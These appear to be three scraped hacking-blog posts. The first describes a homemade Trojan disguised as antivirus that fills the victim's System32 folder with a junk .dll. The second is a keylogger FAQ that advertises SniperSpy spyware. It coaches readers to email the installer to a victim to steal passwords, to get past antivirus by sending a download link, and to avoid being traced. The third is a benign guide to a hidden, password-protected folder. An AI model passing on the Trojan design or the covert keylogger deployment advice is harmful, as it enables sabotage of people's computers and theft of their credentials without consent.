The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the WindowsSystem32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.



The algorithm of the Trojan is as follows



1. Search for the root drive



2. Navigate to WindowsSystem32 on the root drive



3. Create the file named “spceshot.dll”



4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full



5. Once the drive is full, stop the process.



You can download the Trojan source code HERE. Please note that I have not included the executabe for security reasons. You need to compile it to obtain the executable.



How to compile, test and remove the damage?

Compilation:



For step-by-step compilation guide, refer my post How to compile C Programs.



Testing:



To test the Trojan, just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.



NOTE: To remove the warning message you’ve to edit the source code and then re-compile it.



How to remove the Damage and free up the space?



To remove the damage and free up the space, just type the following in the “run” dialog box.



%systemroot%system32



Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

How to use Keyloggers


1. What is a Keylogger?




A keylogger (also called as spy software) is a small program that monitors each and every keystroke a user types on a specific computer’s keyboard. A keylogger program can be installed just in a few seconds and once installed you are only a step away from getting the victim’s password.



2. How Keylogger works?



Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes to http://mail.yahoo.com and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the Yahoo login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke.



3. How to install the keylogger?



A keylogger can be installed just like any other program. Just follow the screen instructions and you’re done.



4. Do I need any special knowledge to install and use the keylogger?



Absolutely NOT! Anyone with a basic computer knowledge can install and use the keylogger. It requires no special skills.



5. Once I install the keylogger can the victim come to know about it’s presence?



No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed the keylogger will run in total stealth mode. Unlike other programs it will never show up in start-menu, start-up, program files, add/remove programs and task manager. So the victim can no way identify it’s presence on his/her PC.



6. Can I be traced back if I install the keylogger on some other computer?



No, it’s almost impossible to trace back to you for installing the keylogger on other’s PC.



7. Which keylogger is the best?



Today there exists hundreds of keyloggers on the market and most of them are no more than a scam. So I tested some of the top keyloggers and conclude that the following is the best one.



SniperSpy





8. How SniperSpy works?



I will try to explain the working of Sniperspy in simple steps.



1. After you purchase Sniperspy, you’ll be able to create the installation module using easy set-up program. You need to email this module to the remote user as an attachment.



2. When the remote user runs the module it’ll get installed silently and monitoring process will begin. The keystrokes are captured and uploaded to the SniperSpy servers continously.



3. You can login to your Sniperspy account (you get this after purchase) to see the logs which contains the password.



9. I don’t have physical access to the traget computer. Can I still use SniperSpy?



Yes you can. SniperSpy supports REMOTE INSTALLATION feature which allows you to remotely install the program on any PC even if you have no physical access to it. For remote installation all you need to do is just place the module (refer FAQ-8) in a .zip/.rar file and send it as an attachment to the target email address (for which you need the password).



10. Can I install SniperSpy on a local computer?



If you need to install to your local (current) computer instead of your remote computer, then the process is simple. Simply navigate to the folder in which you saved your module ( Refer FAQ-8). Double-click the module filename to execute it. Nothing will appear on the screen as the software is installed.



11. What if the antivirus block from sending it as an email attachment?



Instead of sending the keylogger as an email attachment, it is recommended that you place the file in .ZIP/.RAR format and upload it to www.hotlinkfiles.com. After uploading, just send the direct download link to the victim via email. Once he downloads the file from this link and run it, the keylogger will get installed automatically.



12. Why SniperSpy is the best?



■SniperSpy supports REMOTE INSTALLATION feature. This feature is not present on most of the keyloggers.

■SniperSpy is fully compatible with Windows 98/ME/2000/XP/Vista and bypasses ANY Firewall.

■SniperSpy is more reliable than any other keylogger program. You need not rely on your email account to receive the logs. Instead you can just login to your online SniperSpy account to receive the logs.

■SniperSpy captures full-size screenshots of the activities on the target PC.

■Records BOTH sides of chats / IMs in Google Talk, Yahoo IM, Windows Live and more.

■SniperSpy is more easy to install and requires no extra knowledge.

■SniperSpy is recognized by BBC, CNN, CBS and other news networks. Hence it is reputed and trustworthy.

13. How safe is to use SniperSpy?



Sniperspy is completely safe to use since all the customer databases remain confidential and private. SniperSpy do not collect any information from your system other than the information required for the product’s successful operation. They will not contact you in any way unless you request assistance.



14. Is my online order 100% Safe and Secure?



Absolutely Yes! All the e-commerce transactions for SniperSpy is handled by Plimus – they are a trusted online retailer specializing in digitally delivered products. All your information remains private and secure. The safety and protection of your personal information is 100% guaranteed. So you can place your order for SniperSpy with no worries of scam!



SniperSpy is completely reliable, safe and best keylogger out there. It is really worth the price that you pay for it. I promise that you cannot get a better keylogger than this. So what are you waiting for? Go grab SniperSpy now! Visit the following link for more informaion.

How to Make Invisible Password Protected Folder


How to create a Password Protected Folder




Step-1: Create a new folder (Right-click -> New -> Folder) and give it any name of your choice. For instance I name it as ABC.



Step-2: Now in this folder place all the important files, documents or any folders that you want to password protect.



Step-3: Now Right-click on this folder (ABC) and select the option Send To -> Compressed (zipped) Folder.



Step-4: Now a new compressed zipped folder gets created next this folder (ABC) with the same name.



Step-5: Double-click on this compressed zipped folder and you should see your original folder (ABC) here.



Step-6: Now goto the File menu and select the option Add a password.



ie: File -> Add a password



Now a small window will pop up and here you can set your desired password. Once the password is set, the folder will ask for the password every time it is opened. Thus you have now created the password protected folder.







How to make it Invisible



Step-1: Now Right-click on this password protected folder and select Properties.



Step-2: At the bottom select the option Hidden and press OK. Now your folder gets invisible (hidden).



Step-3: In order to unhide this folder go to My Computer – >Tools -> Folder options. Switch to View tab, scroll down and under Hidden files and folders you’ll see the following two options



■Do not show hidden files and folders

■Show hidden files and folders

Now select the second option and press OK. Now the invisible folder becomes visible in it’s location. To access it you need the password. To make it invisible again repeat step -1 through step-3 and select the first option and click OK. Now the folder becomes invisible once again.

How to Make Invisible Password Protected Folder